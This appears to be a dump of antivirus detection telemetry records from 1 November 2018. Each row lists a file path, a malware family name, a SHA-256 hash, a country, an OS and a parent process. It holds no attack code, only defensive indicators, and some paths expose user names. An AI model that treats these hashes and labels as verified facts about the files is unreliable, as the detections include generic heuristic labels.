  Row(detection=Row(filename='avscan-20181101-155554-404e2c2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155554-404E2C2B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aspnetca.exe', filepath='F:\\Windows\\winsxs\\x86_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_12f0dcb013147057\\aspnetca.exe', filesize=512000, name='W32/Sality.AG.#M1.#R1'), hash='45d1cc2c61230ff09f0422271b5a34e58914ebdf13d9ffb9b3b6b861243396f3', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='402793959738212.exe', filepath='\\\\?\\C:\\Temp\\402793959738212.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aspnetca.exe', filepath='F:\\Windows\\winsxs\\x86_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_12f0dcb013147057\\aspnetca.exe', filesize=512000, name='W32/Sality.AG.#M1.#R1'), hash='45d1cc2c61230ff09f0422271b5a34e58914ebdf13d9ffb9b3b6b861243396f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:51:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160318-0b82076d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160318-0B82076D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201230-5481f52c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9636cbec\\AVSCAN-20181101-201113-48EAB96E\\AVSCAN-20181101-201230-5481F52C', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:12:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='489494dcf2a8596e3d4ec8b6b3f157f9c745394a6f607c6890ab344191ae8261', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\489494DCF2A8596E3D4EC8B6B3F157F9C745394A6F607C6890AB344191AE8261', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='489494dcf2a8596e3d4ec8b6b3f157f9c745394a6f607c6890ab344191ae8261', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:51:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh7650.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH7650.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:37:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154746-6eaac23e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154746-6EAAC23E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160331-0da8a60d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160331-0DA8A60D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154723-6abf6793', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154723-6ABF6793', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154604-5d5ebab2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154604-5D5EBAB2', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe711_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe711 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:11:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155806-d715889a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155806-D715889A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\MUI\\S-1-5-86\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='UZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:02:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmpvm2zunum', filepath='/tmp/tmpvm2zunum', filesize=15296000, name='W32/Stanit.#M0.#R0'), hash='3bcf5fb435ca26bf184e2e35c3f7b3ae70e64622ad6da6f74ec01236607b8cbe', metadata=Row(cmdline=None, country='US', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T14:16:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T16:18:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jscript.dll', filepath='\\\\?\\E:\\暴风影音\\jscript.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='13dc69c57b8bc1243e3610c489b68a1a67d35c47cc85e358b71ea3f951c4ec9a', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:20:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crystl32.exe', filepath='J:\\Desktop\\Desktop July 2016\\M Sihag\\m sihag\\PAYBILL\\CRYSREPT\\CRYSTL32.EXE', filesize=3200000, name='TR/Patched.Ren.Gen.#M2.#R3367'), hash='434eb845b05c89395214d92ccfc541cd81aa67b9d14781d11e86121502b974d3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:47:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155443-3673d619', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155443-3673D619', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154551-5b27f468', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154551-5B27F468', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161810-5f25a60a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a69a1854\\AVSCAN-20181101-160113-DD285349\\AVSCAN-20181101-161810-5F25A60A', filesize=392000, name='TR/Trash.Gen.#M1.#R1'), hash='98092b3494fbad6a979e6304edcfe5c69b76848c922436f25b209a63e6e43419', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:18:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='light.dll', filepath='C:\\Windows\\light.dll', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='557e7e2b852f5f84cb105fa10dd73dfd5c84eaac3a6567c5cac6b59579a690d3', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1675264, timestamp='2018-11-01T16:58:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a8b097684af447f22488aa9bd222c28a6089fb0cc3072199d2d371a4508f39fe', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A8B097684AF447F22488AA9BD222C28A6089FB0CC3072199D2D371A4508F39FE', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='a8b097684af447f22488aa9bd222c28a6089fb0cc3072199d2d371a4508f39fe', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:15:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142834-2137c8ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142834-2137C8AC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='заявка_университет_итмо_сноуборд_2.exe', filepath='E:\\УФКиС\\Заявки на соревнования\\Заявка_Университет_ИТМО_сноуборд_2.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8ef95d133c9a034779aba772a4f9c23fb63962a2c2dbb82063dda2d7a21d4ed5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T11:30:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110426-c92a9bf6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110426-C92A9BF6', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124824-d667ef26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124804-C56FDD20\\AVSCAN-20181101-124824-D667EF26', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:48:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:28:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Zec.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T18:03:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:35:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.23403_none_75f4c7b492ce2cb7\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='920b14c64024160f12e05747f3b2976ef33d16e4bcb83d447bc7fa0380007d70', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:34:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='6f45ceba7d6da57833b2d4b6c4ac992f6ef8b9d415eb76b509a188b23bea45d3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-034551-41946ba8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1388de90\\AVSCAN-20181102-034515-3B35AE91\\AVSCAN-20181102-034551-41946BA8', filesize=2176000, name='HEUR/AGEN.1017525.#M1.#R1'), hash='5deadbbe1b1bb51a89a4c03220f1a927b807aa620afa63b4314a7ac9437e0ee5', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:46:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='regschdtask.exe', filepath='C:\\Program Files (x86)\\ASUS\\App Box\\RegSchdTask.exe', filesize=848000, name='W32/Jeefo.A.#M1.#R1'), hash='b1756b4bff7572c5e2469801e246ee03b1e34c35c195abcfe737af2d8ad499be', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:N8yVsjSonka+2cFO.1', country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T13:12:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='partitionfindandmount.exe', filepath='K:\\HBCD\\Programs\\PARTITIONFINDANDMOUNT.EXE', filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='67d41aa654a042c9fdba9127538c263e8e153fcd2347c815a690dd30db380bda', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T02:39:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='.convertedto2d.exe', filepath='G:\\.ConvertedTo2D.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:49:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered docif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5d3e1662e81cf3058a2979d5ca569df72fda4aa3b500d2b6d3f3aea6fda7f20a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:50:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M0.#R0'), hash='99684bc2e499e7647453ae2adcf015c60014033ef8f54ad550b1b45ea2ffea80', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:48:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142810-1ede46df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142810-1EDE46DF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='6757c393755772b9af765255a4546ed8a71ea62881e348d1d6040675f174370a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\6757C393755772B9AF765255A4546ED8A71EA62881E348D1D6040675F174370A', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='6757c393755772b9af765255a4546ed8a71ea62881e348d1d6040675f174370a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T01:44:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T13:03:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:04:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lglwzujbwg.exe', filepath='\\\\?\\C:\\Windows\\oobe3\\lGLWzuJbWg.exe', filesize=4672000, name='HEUR/AGEN.1022544.#M1.#R1'), hash='7ea418f4c94cf73d1643c0f14e2ea4a7bb78a07701d094a5a53ba07b300bcad3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:31:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231626-c5e4c5f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-230344-574DB10D\\AVSCAN-20181101-231626-C5E4C5F8', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='odin3 v3.10.6.exe', filepath='\\\\?\\H:\\12.) DESHA_ITD\\2.) OTHER THINGS\\LAHAT NG INSTALLER\\J7 FLASH FIRM WARE\\Odin3_v3.10.6\\Odin3 v3.10.6.exe', filesize=2368000, name='W32/Viking.AT.#M1.#R1'), hash='169e5d1c7f4fea8069f854d04d1ef83b60ab96d9fdd7334ea961c2d0b548f687', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:28:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='savepass 1.1-bho64.dll', filepath='\\\\?\\C:\\Program Files (x86)\\SavePass 1.1\\SavePass 1.1-bho64.dll', filesize=940000, name='ADWARE/CrossRider.Gen.#M300.#R5892'), hash='15ee2676c95b45800892ec5873aee229893ff4d19cfd133f2e8e02683b37e2c7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T15:35:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8b09da56.exe', filepath='C:\\ProgramData\\{26B60AC9-7D2B-A410-23DF-CA3F18124094}\\8b09da56.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='2bd310998055ce78ad91a9f366d94b970fd4b4f4c1de14e3bd57a7fc1de1bbc4', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\QQ电脑管家\\QQPCMgr\\12.13.19475.203\\QQPCRTP.exe', parentsize=307200, timestamp='2018-11-01T11:12:29Z'), dt=datetime.date(2018, 11, 1)),
